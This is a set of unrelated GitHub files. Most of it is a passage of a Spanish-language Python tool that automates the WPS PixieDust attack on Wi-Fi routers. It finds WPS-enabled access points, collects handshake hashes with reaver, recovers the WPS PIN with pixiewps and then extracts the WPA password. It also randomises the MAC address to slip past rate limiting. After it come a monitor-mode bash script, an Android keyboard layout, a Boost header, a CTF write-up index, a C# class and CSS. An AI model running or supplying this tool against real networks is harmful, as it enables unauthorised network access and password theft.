Aca se chequea todo, y se empieza el programa
"""
def __init__(self):
self.REAVER = True
self.PIXIEWPS = True
self.WASH = True
self.AIRMON = True
self.MACCHANGER = True
self.GIT = True
def start(self):
"""
Crea el colchon para los programas necesarios
"""
chdir('/root/')
if not c.check_iface(): # check_iface devuelve True si hay alguna ifaz en mon previamente
c.set_iface("UP")
else:
print INFO + "Se encontro una interfaz en modo monitor: %s" %c.IFACE_MON
choice = raw_input("%sDesea usar esta interfaz? [S/n] " %INPUT)
if choice in CHOICES_YES:
pass
elif choice in CHOICES_NOPE:
c.set_iface("DOWN")
c.set_iface("UP")
if FOREVER:
while True:
attack = Attack()
attack.get_wps_aps()
else:
attack = Attack()
attack.get_wps_aps()
engine.exit_limpio()
def parse_wash(self, linea):
"""
Analiza el output del wash
linea viene sin el salto de linea, separando las cosas con "|"
Devuelve bssid, canal, essid e instancia de Target
"""
linea = linea.split('|')
bssid = linea[0] # MAC
canal = linea[1]
essid = linea[-1]
return [bssid, canal, essid]
def parse_reaver(self, output, pin_encontrado = False):
"""
Analiza el output del reaver
Saca el pkr, pke, hash1 y 2, enonce, rnonce, authkey, fabricante y modelo
y los devuelve
"""
if pin_encontrado:
password = ''
for linea in output:
if '[+] WPA PSK: ' in linea:
password = sub('\[\+\] WPA PSK: ','',linea)
return password
if password == '':
return 'no password'
E_NONCE = ''
R_NONCE = ''
PKR = ''
PKE = ''
HASH1 = ''
HASH2 = ''
AUTHKEY = ''
MANUFACTURER = ''
MODEL = ''
NUMBER = ''
uberlista = []
lista_final = []
is_complete = False
has_something = False
if output == '':
return 'cacota'
for linea in output:
if 'E-Nonce' in linea:
has_something = True
elif 'E-Hash2' in linea:
lista_final = output[0:output.index(linea)+1] # Trunca el output hasta el hash2
is_complete = True
break
elif 'Detected AP rate limiting' in linea:
return 'ap rate limited'
if has_something and not is_complete:
return 'more time please'
elif has_something == False:
return 'noutput'
for linea in lista_final:
if 'E-Nonce' in linea:
E_NONCE = sub('\[P\] E-Nonce: ','',linea)
elif 'R-Nonce' in linea:
R_NONCE = sub('\[P\] R-Nonce: ','',linea)
elif 'PKR' in linea:
PKR = sub('\[P\] PKR: ','',linea)
elif 'PKE' in linea:
PKE = sub('\[P\] PKE: ','',linea)
elif 'E-Hash1' in linea:
HASH1 = sub('\[P\] E-Hash1: ','',linea)
elif 'E-Hash2' in linea:
HASH2 = sub('\[P\] E-Hash2: ','',linea)
elif 'AuthKey' in linea:
AUTHKEY = sub('\[P\] AuthKey: ','',linea)
elif 'Manufacturer' in linea:
MANUFACTURER = sub('\[P\] WPS Manufacturer: ','',linea)
elif 'Model Name' in linea:
MODEL = sub('\[P\] WPS Model Name: ','',linea)
elif 'Model Number' in linea:
NUMBER = sub('\[P\] WPS Model Number: ','',linea)
elif '[+] Associated with ' in linea:
ESSID = sub('\(ESSID\: ','|',linea)
ESSID = ESSID.split('|')[-1][:-2]
elif '[+] Waiting for beacon from ' in linea:
BSSID = sub('\[\+\] Waiting for beacon from ','',linea)
else:
pass
uberlista = [PKE.strip(),PKR.strip(),HASH1.strip(),HASH2.strip(),AUTHKEY.strip(),
MANUFACTURER.strip(),MODEL.strip(),NUMBER.strip(),E_NONCE.strip(),R_NONCE.strip(),
ESSID.strip(),BSSID.strip()]
return uberlista
def check(self, check_again = False):
"""
Chequea dependencias, el usuario que ejecuta el programa y otras weas
"""
if c.get_uid() != '0':
print ALERTA + 'Necesita ejecutar este programa como superusuario'
exit()
### Programas
if c.program_exists(MACCHANGER):
self.MACCHANGER = True
elif not check_again:
print ALERTA + 'macchanger no esta instalado pero no es vital para el programa.'
print ' Algunos APs bloquean la MAC del dispositivo con el que se ataca y'
print ' cambiar la MAC es una buena solucion para desviar el problema.'
print ' Si no se tiene macchanger el programa fallara en recolectar la informacion.'
self.MACCHANGER = False
if c.program_exists(REAVER):
version = c.check_reaver_version()
if version == '1.5.2':
self.REAVER = True
else:
print ALERTA + "La version de reaver instalada no es la correcta"
self.REAVER = False
elif not check_again:
print ALERTA + 'reaver no esta instalado'
self.REAVER = False
if c.program_exists(PIXIEWPS):
self.PIXIEWPS = True
elif not check_again:
print ALERTA + 'pixiewps no esta instalado'
self.PIXIEWPS = False
if c.program_exists(WASH):
self.WASH = True
elif not check_again:
print ALERTA + 'wash no esta instalado'
self.WASH = False
if c.program_exists(AIRMON):
self.AIRMON = True
elif not check_again:
print ALERTA + 'airmon-ng no esta instalado'
self.AIRMON = False
if c.program_exists(GIT):
self.GIT = True
elif not check_again:
self.GIT = False
if self.REAVER and self.AIRMON and self.WASH and self.PIXIEWPS and check_again:
print INFO + "Todos los programas se instalaron correctamente."
raw_input("%sPresione enter para continuar" %INPUT)
print INFO + "Empezando el ataque..."
elif check_again:
print
print ALERTA + "No se pudieron instalar algunos prorgamas."
print " Revise manualmente las dependecias necesitadas"
print " y luego de instalarlas, ejecute otra vez el programa."
print
exit()
if self.REAVER and self.AIRMON and self.WASH and self.PIXIEWPS:
pass
else:
print ALERTA + "Necesita tener todos los programas necesarios."
print INPUT + "Las dependencias son:"
print "\tbuild-essential"
print "\tlibpcap-dev"
print "\tsqlite3"
print "\tlibsqlite3-dev"
print "\taircrack-ng"
print "\tlibssl-dev"
choice = raw_input("%sDesea que instalarlas ahora [S/n]?" %INPUT)
if choice in CHOICES_YES:
c.get_binarios()
else:
exit()
###Todo en orden...
engine.start()
def run(self, cmd, shell = False, kill_tree = True, timeout = -1):
"""
Ejecuta un comando durante un tiempo determinado que,
transcurrido, es terminado. Devuelve el stdout del proc.
output es una lista con las lineas sin strip().
"""
class Alarm(Exception):
pass
def alarm_handler(signum, frame):
raise Alarm
if timeout != -1:
signal(SIGALRM, alarm_handler) # Empieza a correr el tiempo
alarm(timeout) # Si se acaba levanta una alarma
proc = subprocess.Popen(cmd, shell = shell, stdout = subprocess.PIPE)
output = []
try:
for line in iter(proc.stdout.readline, ''):
output.append(line)
if timeout != -1:
alarm(0)
except Alarm: # El tiempo acaba y se produce una alarma
pids = [proc.pid] # Se matan los procesos relacionados con proc.
if kill_tree:
pids.extend(self.get_process_children(proc.pid))
for pid in pids: # Es posible que el proceso haya muerto antes de esto
try: # por eso se maneja el error con el except OSError
kill(pid, SIGKILL)
except OSError:
pass
return output
return output
def get_process_children(self, pid):
"""
Devuelve los pids del programa que se haya abierto para
matar todo el arbol de procesos child
"""
proc = subprocess.Popen('ps --no-headers -o pid --ppid %d' % pid, shell = True, stdout = subprocess.PIPE)
stdout = proc.communicate()[0]
return [int(p) for p in stdout.split()]
def mac_changer(self):
"""
Cambia la MAC del dispositivo ante un bloqueo del AP
"""
print INFO + "Cambiando direccion MAC del dispositivo..."
system('ifconfig %s down' %c.IFACE_MON)
system('iwconfig %s mode Managed' %c.IFACE_MON)
system('ifconfig %s up' %c.IFACE_MON)
system('ifconfig %s down' %c.IFACE_MON)
mac = subprocess.check_output(['macchanger','-r',c.IFACE_MON])
mac = mac.split('\n')[2]
mac = sub('New MAC\: ','',mac.strip())
mac = sub(' \(unknown\)','',mac)
system('ifconfig %s up' %c.IFACE_MON)
system('ifconfig %s down' %c.IFACE_MON)
system('iwconfig %s mode monitor' %c.IFACE_MON)
system('ifconfig %s up' %c.IFACE_MON)
print INFO + "Se cambio la MAC a una nueva: %s%s" %(INPUT,mac.upper())
def exit_limpio(self):
"""
limpia las cosas antes de terminar el programa
"""
if path.isfile('/root/pixiewps/Makefile') or path.isfile('/root/reaver-wps-fork-t6x/src/Makefile'):
print OPCION + "Los archivos para instalar pixiewps y reaver ya no son necesarios"
print " y se encuentran en la carpeta home del usuario root"
choice = raw_input("%sDesea borrarlos? [S/n]" %INPUT)
if choice in CHOICES_YES:
system('cd /root && rm -r pixiewps/ && rm -r reaver-wps-fork-t6x/')
if c.IS_MON:
c.set_iface("DOWN")
if USE_REAVER:
system('rm -f /usr/local/etc/reaver/*.wpc')
exit()
class Config():
"""
Funciones de configuracion de interfaces.
"""
IFACE_MON = 'caca'
IFACE = 'caca'
IS_MON = False
def program_exists(self, programa):
"""
Chequea si existe el programa que se le
pasa en el argumento
"""
cmd = "which " + programa
output = subprocess.Popen(cmd, shell=True, stdout = subprocess.PIPE)
output = output.communicate()[0]
if output != "":
return True # Existe
else:
return False # No existe
def get_uid(self):
"""
Devuelve el usuario que ejecuta el script
"""
uid = subprocess.check_output(['id','-u']).strip()
return uid
def check_iface(self):
"""
Se fija si hay alguna interfaz en modo monitor
para no crear otra interfaz al pedo
"""
cmd = "ifconfig | grep mon | cut -d \' \' -f1" # iwconfig no es grepable
mon = subprocess.check_output(cmd, shell = True).strip()
if mon != '':
self.IFACE_MON = mon
self.IS_MON = True
return True
else:
return False
def get_iface(self):
"""
Si no hay interfaces en modo monitor, devuelve las wlans.
Si hay mas de una, pregunta cual se quiere usar.
Si la interfaz ya esta en modo monitor, devuelve el nombre.
"""
if self.IS_MON: # Si la interfaz esta en modo monitor devuelve el nombre 'mon'
cmd = "ifconfig | grep mon | cut -d \' \' -f1"
mon = subprocess.check_output(cmd, shell = True).strip()
self.IFACE_MON = mon
return mon
else:
cmd = "ifconfig | grep wlan | cut -d \' \' -f1"
proc = subprocess.check_output(cmd, shell = True)
ifaces = proc.strip().split('\n')
if len(ifaces) == 1 and ifaces[0] == '':
print ALERTA + "No hay interfaces wireless!"
print " Asegurese de que posee un dispositivo wireless."
print " Si esta corriendo en una maquina virtual debe"
print " adquirir un modulo WiFi USB."
exit()
elif len(ifaces) > 1:
print INPUT + "Seleccione interfaz: "
for i in ifaces:
print str(ifaces.index(i)) + " >> " + i
while True: #Evita que le mandes fruta
try:
choice = int(raw_input(INPUT))
if choice <= len(ifaces) and choice >= 0:
self.IFACE = ifaces[choice]
return ifaces[choice]
break
else:
print INPUT + "Inserte un numero entre 0 y %s" %(len(ifaces)-1) #Maneja el error de indice
except ValueError:
print ALERTA + "Inserte un numero entre 0 y %s" %(len(ifaces)-1) #Por si le mandas letras y no #s
except KeyboardInterrupt:
print
print ALERTA + "Programa interrumpido"
print
engine.exit_limpio()
else:
self.IFACE = ifaces[0]
return ifaces[0]
def set_iface(self, status):
"""
Maneja la interfaz inalambrica. La pone en modo monitor
y la repone al modo normal.
La variable "status" esta solo para mejorar la lectura
Se basa en el booleano "self.IS_MON"
"""
if self.IS_MON:
cmd = 'airmon-ng stop ' + self.get_iface()
print INFO + 'Terminando el modo monitor en la interfaz %s...' %self.IFACE_MON
proc = subprocess.call(cmd, shell = True, stdout = subprocess.PIPE)
self.IS_MON = False
print INFO + 'Listo'
else:
cmd = 'airmon-ng start ' + self.get_iface()
print INFO + 'Configurando la interfaz en modo monitor...'
proc = subprocess.call(cmd, shell = True, stdout = subprocess.PIPE)
self.check_iface()
print INFO + "%s corriendo en modo monitor" %self.IFACE
def data_file(self, data):
"""
Guarda la informacion en un archivo
"""
system('echo INFORMACION >> %s' %OUTPUT_FILE)
with open(OUTPUT_FILE, 'a+') as f:
fecha = str(time.gmtime()[1])+'-'+str(time.gmtime()[2])+'-'+str(time.gmtime()[0])
hora = str((time.gmtime()[3])-3).zfill(2)+':'+str(time.gmtime()[4]).zfill(2)
f.write(fecha+' | '+hora+'\n')
f.writelines(data)
print INFO + "Se guardo la informacion en el archivo %s" %OUTPUT_FILE
def get_binarios(self):
"""
Instala reaver, pixiewps y otras dependencias
"""
git = 'apt-get -y install git'
reaver_dep = 'apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng'
pixie_dep = 'sudo apt-get -y install libssl-dev'
reaver = 'git clone https://github.com/t6x/reaver-wps-fork-t6x.git'
pixiewps = 'git clone https://github.com/wiire/pixiewps.git'
aircrack = 'apt-get -y install aircrack-ng'
if not engine.GIT:
print INFO + "Instalando git"
proc4 = system(git)
if not engine.AIRMON:
print INFO + "Instalando aircrack..."
proc5 = system(aircrack)
if not engine.PIXIEWPS:
print INFO + "Instalando dependencias de pixiewps..."
proc2 = system(pixie_dep)
print INFO + "Descargando pixiewps..."
proc3 = system(pixiewps)
if not engine.REAVER:
print INFO + "Instalando las dependencias de reaver..."
proc = system(reaver_dep)
print INFO + "Descargando reaver..."
proc1 = system(reaver)
if path.isdir('pixiewps') and not engine.PIXIEWPS:
print INFO + "Instalando pixiewps..."
system('cd pixiewps/src && make && make install')
print INFO + "Listo"
if path.isdir('reaver-wps-fork-t6x') and not engine.REAVER:
print INFO + "Instalando reaver..."
system('cd reaver-wps-fork-t6x* && cd src && ./configure && make && make install')
print INFO + "Listo"
engine.check(check_again = True)
def check_reaver_version(self):
"""
Devuelve la version de reaver que se tiene instalada
"""
output = subprocess.Popen('reaver -h', shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE)
output = output.communicate()
if 'Reaver v1.5.2 WiFi Protected Setup Attack Tool' in output[0] and 'mod by t6_x' in output[0]:
return '1.5.2'
elif output[0] != '':
return output[0][9:12]
elif 'Reaver v1.5.2 WiFi Protected Setup Attack Tool' in output[1] and 'mod by t6_x' in output[1]:
return '1.5.2'
elif output[1] != '':
return output[1][9:12]
class Attack():
"""
Funciones de ataque y recopilacion de informacion del AP
"""
def get_wps_aps(self):
"""
Enumera los APs con WPS
Crea las instancias de Target.
Pasa a get_reaver_info
"""
print INFO + "Enumerando APs con WPS activado..."
cmd = 'wash -i %s -P' %(c.IFACE_MON)
if WASH_CHANNEL != '':
cmd = cmd + ' -c %d' %WASH_CHANNEL
lista_aps = engine.run(cmd, shell = True, timeout = WASH_TIME)
lista_provisoria = []
ultimo = len(lista_aps)-1
for linea in lista_aps: # Esto se tiene que hacer por irregularidades ocasionales
if '|' in linea: # en el output del wash.
lista_provisoria.append(linea) #
lista_aps = lista_provisoria #
if lista_aps == []:
print
print ALERTA + "No se encontraron APs con WPS activado."
print
if not FOREVER:
engine.exit_limpio()
else:
for_fill = lista_aps #\
essids = [] #|
for line in for_fill: #|- Para que quede mas linda la lista
line = line.split('|') #|- de los APs.
essids.append(line[5].strip()) #|
fill = len(max(essids)) #/
print INFO + "Se encontraron los siguientes APs con WPS activado:"
for linea in lista_aps:
linea = linea.split('|')
fill_line = fill - len(linea[5].strip())
print '\t' + INPUT + str(linea[5].strip()) + ' '*fill_line + ' || ' + linea[0] + ' || Canal: ' + linea[1] + ' || WPS locked?: ' + linea[4]
if USE_REAVER:
while True:
try:
if len(lista_aps) != 1 and PROMPT_APS:
choice = int(raw_input("%sProporcione el inice del AP: " %INPUT))
provisoria = []
provisoria.append(lista_aps[choice])
lista_aps = provisoria
break
else:
break
except KeyboardInterrupt:
print
engine.exit_limpio()
break
except ValueError:
print ALERTA + "Proporcione un numero entre 0 y %d" %ultimo
if not OVERRIDE and path.isfile('pyxiewpsdata.txt'):
coincidencias = []
pin_correspondiente = []
with open('pyxiewpsdata.txt') as f:
ya_sacados = f.readlines()
if len(ya_sacados) > 1:
ya_sacados.reverse() # Se revierte para tomar el pin mas actualizado ante un posible
for target in lista_aps: # cambio del pin WPS.
for line in ya_sacados[1:]:
if target.split('|')[5].strip() == line.strip():
coincidencias.append(target)
pin_correspondiente.append(ya_sacados[ya_sacados.index(line)-1].strip())
for i in set(coincidencias):
print OPCION + "El pin de %s ya ha sido averiguado: " %i.split('|')[5].strip()
print '\t'+ INPUT + pin_correspondiente[coincidencias.index(i)]
print OPCION + "Desea saltearlo? [S/n]: "
try:
choice = raw_input("%s Enter para saltear: " %INPUT)
except KeyboardInterrupt:
print
engine.exit_limpio()
if choice in CHOICES_YES:
lista_aps.remove(i)
for linea in lista_aps:
args = engine.parse_wash(linea.strip())
self.get_reaver_info(args[0],args[1],args[2])
if not FOREVER:
engine.exit_limpio()
else:
pass
def get_reaver_info(self, bssid, canal, essid):
"""
Recopila la informacion vital para
el ataque PixieDust. PKR, PKE, HASH1, HASH2, AUTHKEY
Actua dentro del for-loop de get_wps_aps
"""
print INFO + "Recopilando informacion de %s con reaver..." %essid
output = engine.run(cmd=['reaver','-i',c.IFACE_MON,'-b',bssid,'-vvv','-L','-c',canal], timeout = REAVER_TIME)
data = engine.parse_reaver(output)
if data == 'noutput':
print
print ALERTA + "No se pudo obtener la informacion necesaria del AP"
print ALERTA + "Pruebe con un tiempo mas alto como argumento -t"
print " y si aun no se puede obtener la informacion"
print " mejore la recepcion de su interfaz"
print
if MACCHANGER and FOREVER:
engine.mac_changer()
elif MACCHANGER and not FOREVER:
print ALERTA + "No se cambia la MAC porque se ejecuto una sola vez"
print " Corra el programa con el argumento -F para correr indefinidamente"
print
elif not MACCHANGER:
print ALERTA + "No se puede cambiar la MAC del dispositivo"
print " porque no se tiene macchanger instalado."
print
elif data == 'more time please':
print
print ALERTA + "El programa obtuvo alguna informacion pero no alcanzo"
print " a recuperar todo lo necesario. Aumente el tiempo para buscar"
print " la informacion del AP con el argumento -t. Por default -t es 6 segundos"
print
elif data == 'ap rate limited':
print
print ALERTA + "Al AP no le gustan los ataques de WPS"
print " por lo tanto no se pudo recopilar la informacion"
print
if MACCHANGER and FOREVER:
engine.mac_changer()
elif MACCHANGER and not FOREVER:
print ALERTA + "No se cambia la MAC porque se ejecuto una sola vez"
print " Corra el programa con el argumento -F para atacar indefinidamente"
print
elif not MACCHANGER:
print ALERTA + "No se puede cambiar la MAC del dispositivo"
print " porque no se tiene macchanger instalado."
print
elif data == 'cacota':
print
print "Seleccione una opcion de sesion para reaver"
if not FOREVER:
engine.exit_limpio()
else:
print INFO + "Exito. Se encontro la informacion necesaria."
for_file = ['ESSID: ' + data[10] + '\n','MAC: ' + data[11] + '\n','PKE: ' + data[0] + '\n',
'PKR: ' + data[1] + '\n','HASH1: ' + data[2] + '\n','HASH2: ' + data[3] + '\n',
'E-NONCE: ' + data[8] + '\n','R-NONCE: ' + data[9] + '\n','AUTHKEY: ' + data[4] + '\n',
'FABRICANTE: ' + data[5] + '\n','MODELO: ' + data[6] + '\n','NUMERO DE MODELO: ' + data[7] + '\n']
if PRINT_REAVER:
print
for linea in for_file:
print DATA + linea.strip()
print
if OUTPUT and not USE_PIXIEWPS:
for_file.append('-'*40+'\n')
c.data_file(for_file)
if USE_PIXIEWPS:
self.pixie_attack(data,for_file,canal)
def pixie_attack(self,data,for_file,canal):
"""
intenta recuperar el pin WPS usando el ataque PixieDust
"""
ESSID = data[10]
BSSID = data[11]
PKE = data[0]
PKR = data[1]
HASH1 = data[2]
HASH2 = data[3]
AUTHKEY = data[4]
E_NONCE = data[8]
R_NONCE = data[9]
cmd = ['pixiewps','-e',PKE,'-r',PKR,'-s',HASH1,'-z',HASH2,'-a',AUTHKEY,'-n',E_NONCE]
cmd1 = ['pixiewps','-e',PKE,'-s',HASH1,'-z',HASH2,'-a',AUTHKEY,'-n',E_NONCE,'-S']
cmd2 = ['pixiewps','-e',PKE,'-s',HASH1,'-z',HASH2,'-n',E_NONCE,'-m',R_NONCE,'-b',BSSID,'-S']
pin = ''
cmd_list = [cmd, cmd1, cmd2]
output = []
for command in cmd_list:
try:
output = subprocess.check_output(command)
output = output.strip().split('\n')
for linea in output:
if '[+] WPS pin:' in linea:
result = compile('\d+')
pin = result.search(linea).group(0)
break
else:
pass
except: #Tengo que manejar un posible error del Pixie
pass
if pin != '': break
if pin != '' and len(pin) == 8:
print INFO + "Pin WPS encontrado!"
print "\t" + INPUT + pin
for_file.append('Pin WPS: '+pin+'\n')
system('echo >> pyxiewpsdata.txt')
with open('pyxiewpsdata.txt','a+') as f:
f.write(ESSID+'\n')
f.write(pin)
elif pin == '':
print
print ALERTA + "No se encontro el pin WPS."
print " Es posible que el AP no sea vulnerable al"
print " ataque PixieDust y nunca lo sea"
print
if GET_PASSWORD and pin != '':
self.get_password(for_file, BSSID, pin, canal)
elif OUTPUT:
for_file.append('-'*40+'\n')
c.data_file(for_file)
def get_password(self, for_file, BSSID, pin, canal):
"""
Intenta averiguar la contrasenia, una vez que se consiguio el pin WPS
"""
output = engine.run(cmd=['reaver','-i',c.IFACE_MON,'-b',BSSID,'-c',canal,'-p',pin,'-L'], timeout = (REAVER_TIME+4))
password = engine.parse_reaver(output, pin_encontrado = True)
if password == 'no password':
print
print ALERTA + "No se pudo recuperar la contrasenia en este momento"
print " pero puede acceder a la red WiFi a traves del pin WPS"
print
else:
print INFO + "Clave encontrada!"
print '\t' + INPUT + password.strip()
if OUTPUT:
for_file.append('Password: ' + password + '\n'+'-'*40+'\n')
c.data_file(for_file)
if __name__ == '__main__':
arg_parser()
banner()
try:
c = Config()
engine = Engine()
engine.check()
except (KeyboardInterrupt, EOFError):
print
print ALERTA + "Programa interrumpido!"
print
engine.exit_limpio()
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<Keyboard xmlns:android="http://schemas.android.com/apk/res/android"
android:keyWidth="15%p"
android:keyHeight="@integer/key_normal_height">
<Row android:rowEdgeFlags="top">
<Key android:codes="54" android:keyEdgeFlags="left"/>
<Key android:codes="ñ"/>
<Key android:codes="ń"/>
</Row>
<Row android:rowEdgeFlags="bottom">
<Key android:codes="ò" android:keyEdgeFlags="left"/>
<Key android:codes="ó"/>
<Key android:codes="õ"/>
<Key android:codes="ô"/>
<Key android:codes="ö"/>
<Key android:codes="ø"/>
<Key android:codes="ő"/>
<Key android:codes="ō"/>
<Key android:codes="œ" android:keyEdgeFlags="right"/>
</Row>
</Keyboard>
| {
"pile_set_name": "Github"
} |
#!/usr/bin/sudo /bin/bash
modprobe -r iwlwifi mac80211 cfg80211
modprobe iwlwifi debug=0x40000
ifconfig wlan0 2>/dev/null 1>/dev/null
while [ $? -ne 0 ]
do
ifconfig wlan0 2>/dev/null 1>/dev/null
done
iw dev wlan0 interface add mon0 type monitor
iw mon0 set channel $1 $2
ifconfig mon0 up
| {
"pile_set_name": "Github"
} |
// Copyright Aleksey Gurtovoy 2000-2004
//
// Distributed under the Boost Software License, Version 1.0.
// (See accompanying file LICENSE_1_0.txt or copy at
// http://www.boost.org/LICENSE_1_0.txt)
//
// Preprocessed version of "boost/mpl/aux_/reverse_fold_impl.hpp" header
// -- DO NOT modify by hand!
namespace boost { namespace mpl { namespace aux {
/// forward declaration
template<
long N
, typename First
, typename Last
, typename State
, typename BackwardOp
, typename ForwardOp
>
struct reverse_fold_impl;
template<
typename First
, typename Last
, typename State
, typename BackwardOp
, typename ForwardOp
>
struct reverse_fold_impl< 0,First,Last,State,BackwardOp,ForwardOp >
{
typedef First iter0;
typedef State fwd_state0;
typedef fwd_state0 bkwd_state0;
typedef bkwd_state0 state;
typedef iter0 iterator;
};
template<
typename First
, typename Last
, typename State
, typename BackwardOp
, typename ForwardOp
>
struct reverse_fold_impl< 1,First,Last,State,BackwardOp,ForwardOp >
{
typedef First iter0;
typedef State fwd_state0;
typedef typename apply2< ForwardOp, fwd_state0, typename deref<iter0>::type >::type fwd_state1;
typedef typename mpl::next<iter0>::type iter1;
typedef fwd_state1 bkwd_state1;
typedef typename apply2< BackwardOp, bkwd_state1, typename deref<iter0>::type >::type bkwd_state0;
typedef bkwd_state0 state;
typedef iter1 iterator;
};
template<
typename First
, typename Last
, typename State
, typename BackwardOp
, typename ForwardOp
>
struct reverse_fold_impl< 2,First,Last,State,BackwardOp,ForwardOp >
{
typedef First iter0;
typedef State fwd_state0;
typedef typename apply2< ForwardOp, fwd_state0, typename deref<iter0>::type >::type fwd_state1;
typedef typename mpl::next<iter0>::type iter1;
typedef typename apply2< ForwardOp, fwd_state1, typename deref<iter1>::type >::type fwd_state2;
typedef typename mpl::next<iter1>::type iter2;
typedef fwd_state2 bkwd_state2;
typedef typename apply2< BackwardOp, bkwd_state2, typename deref<iter1>::type >::type bkwd_state1;
typedef typename apply2< BackwardOp, bkwd_state1, typename deref<iter0>::type >::type bkwd_state0;
typedef bkwd_state0 state;
typedef iter2 iterator;
};
template<
typename First
, typename Last
, typename State
, typename BackwardOp
, typename ForwardOp
>
struct reverse_fold_impl< 3,First,Last,State,BackwardOp,ForwardOp >
{
typedef First iter0;
typedef State fwd_state0;
typedef typename apply2< ForwardOp, fwd_state0, typename deref<iter0>::type >::type fwd_state1;
typedef typename mpl::next<iter0>::type iter1;
typedef typename apply2< ForwardOp, fwd_state1, typename deref<iter1>::type >::type fwd_state2;
typedef typename mpl::next<iter1>::type iter2;
typedef typename apply2< ForwardOp, fwd_state2, typename deref<iter2>::type >::type fwd_state3;
typedef typename mpl::next<iter2>::type iter3;
typedef fwd_state3 bkwd_state3;
typedef typename apply2< BackwardOp, bkwd_state3, typename deref<iter2>::type >::type bkwd_state2;
typedef typename apply2< BackwardOp, bkwd_state2, typename deref<iter1>::type >::type bkwd_state1;
typedef typename apply2< BackwardOp, bkwd_state1, typename deref<iter0>::type >::type bkwd_state0;
typedef bkwd_state0 state;
typedef iter3 iterator;
};
template<
typename First
, typename Last
, typename State
, typename BackwardOp
, typename ForwardOp
>
struct reverse_fold_impl< 4,First,Last,State,BackwardOp,ForwardOp >
{
typedef First iter0;
typedef State fwd_state0;
typedef typename apply2< ForwardOp, fwd_state0, typename deref<iter0>::type >::type fwd_state1;
typedef typename mpl::next<iter0>::type iter1;
typedef typename apply2< ForwardOp, fwd_state1, typename deref<iter1>::type >::type fwd_state2;
typedef typename mpl::next<iter1>::type iter2;
typedef typename apply2< ForwardOp, fwd_state2, typename deref<iter2>::type >::type fwd_state3;
typedef typename mpl::next<iter2>::type iter3;
typedef typename apply2< ForwardOp, fwd_state3, typename deref<iter3>::type >::type fwd_state4;
typedef typename mpl::next<iter3>::type iter4;
typedef fwd_state4 bkwd_state4;
typedef typename apply2< BackwardOp, bkwd_state4, typename deref<iter3>::type >::type bkwd_state3;
typedef typename apply2< BackwardOp, bkwd_state3, typename deref<iter2>::type >::type bkwd_state2;
typedef typename apply2< BackwardOp, bkwd_state2, typename deref<iter1>::type >::type bkwd_state1;
typedef typename apply2< BackwardOp, bkwd_state1, typename deref<iter0>::type >::type bkwd_state0;
typedef bkwd_state0 state;
typedef iter4 iterator;
};
template<
long N
, typename First
, typename Last
, typename State
, typename BackwardOp
, typename ForwardOp
>
struct reverse_fold_impl
{
typedef First iter0;
typedef State fwd_state0;
typedef typename apply2< ForwardOp, fwd_state0, typename deref<iter0>::type >::type fwd_state1;
typedef typename mpl::next<iter0>::type iter1;
typedef typename apply2< ForwardOp, fwd_state1, typename deref<iter1>::type >::type fwd_state2;
typedef typename mpl::next<iter1>::type iter2;
typedef typename apply2< ForwardOp, fwd_state2, typename deref<iter2>::type >::type fwd_state3;
typedef typename mpl::next<iter2>::type iter3;
typedef typename apply2< ForwardOp, fwd_state3, typename deref<iter3>::type >::type fwd_state4;
typedef typename mpl::next<iter3>::type iter4;
typedef reverse_fold_impl<
( (N - 4) < 0 ? 0 : N - 4 )
, iter4
, Last
, fwd_state4
, BackwardOp
, ForwardOp
> nested_chunk;
typedef typename nested_chunk::state bkwd_state4;
typedef typename apply2< BackwardOp, bkwd_state4, typename deref<iter3>::type >::type bkwd_state3;
typedef typename apply2< BackwardOp, bkwd_state3, typename deref<iter2>::type >::type bkwd_state2;
typedef typename apply2< BackwardOp, bkwd_state2, typename deref<iter1>::type >::type bkwd_state1;
typedef typename apply2< BackwardOp, bkwd_state1, typename deref<iter0>::type >::type bkwd_state0;
typedef bkwd_state0 state;
typedef typename nested_chunk::iterator iterator;
};
template<
typename First
, typename Last
, typename State
, typename BackwardOp
, typename ForwardOp
>
struct reverse_fold_impl< -1,First,Last,State,BackwardOp,ForwardOp >
{
typedef reverse_fold_impl<
-1
, typename mpl::next<First>::type
, Last
, typename apply2<ForwardOp,State, typename deref<First>::type>::type
, BackwardOp
, ForwardOp
> nested_step;
typedef typename apply2<
BackwardOp
, typename nested_step::state
, typename deref<First>::type
>::type state;
typedef typename nested_step::iterator iterator;
};
template<
typename Last
, typename State
, typename BackwardOp
, typename ForwardOp
>
struct reverse_fold_impl< -1,Last,Last,State,BackwardOp,ForwardOp >
{
typedef State state;
typedef Last iterator;
};
}}}
| {
"pile_set_name": "Github"
} |
# Writeup 33C3 CTF 2016
Team: akrasuski1, c7f.m0d3, cr019283, msm, nazywam, ppr, psrok, rev, shalom

### Table of contents
* [YOSO (web 250)](web_250_yoso)
* [Pay2Win (web 200)](web_200_pay2win)
* [list0r (web 400)](web_400_list0r)
* [try (web 150)](web_150_try) | {
"pile_set_name": "Github"
} |
using Microsoft.Extensions.Logging;
using System;
using System.Collections.Generic;
using System.Text;
using System.Threading;
namespace Surging.Core.ServiceHosting.Internal.Implementation
{
public class ApplicationLifetime : IApplicationLifetime
{
private readonly CancellationTokenSource _startedSource = new CancellationTokenSource();
private readonly CancellationTokenSource _stoppingSource = new CancellationTokenSource();
private readonly CancellationTokenSource _stoppedSource = new CancellationTokenSource();
private readonly ILogger<ApplicationLifetime> _logger;
public ApplicationLifetime(ILogger<ApplicationLifetime> logger)
{
_logger = logger;
}
public CancellationToken ApplicationStarted => _startedSource.Token;
public CancellationToken ApplicationStopping => _stoppingSource.Token;
public CancellationToken ApplicationStopped => _stoppedSource.Token;
public void NotifyStarted()
{
try
{
ExecuteHandlers(_startedSource);
}
catch (Exception ex)
{
_logger.LogError( "An error occurred starting the application",
ex);
}
}
public void NotifyStopped()
{
try
{
ExecuteHandlers(_stoppedSource);
}
catch (Exception ex)
{
_logger.LogError("An error occurred stopping the application",
ex);
}
}
public void StopApplication()
{
lock (_stoppingSource)
{
try
{
ExecuteHandlers(_stoppingSource);
}
catch (Exception ex)
{
_logger.LogError("An error occurred stopping the application",
ex);
}
}
}
private void ExecuteHandlers(CancellationTokenSource cancel)
{
if (cancel.IsCancellationRequested)
{
return;
}
cancel.Cancel(throwOnFirstException: false);
}
}
}
| {
"pile_set_name": "Github"
} |
/* iCheck plugin Minimal skin, orange
----------------------------------- */
.icheckbox_minimal-orange,
.iradio_minimal-orange {
display: inline-block;
*display: inline;
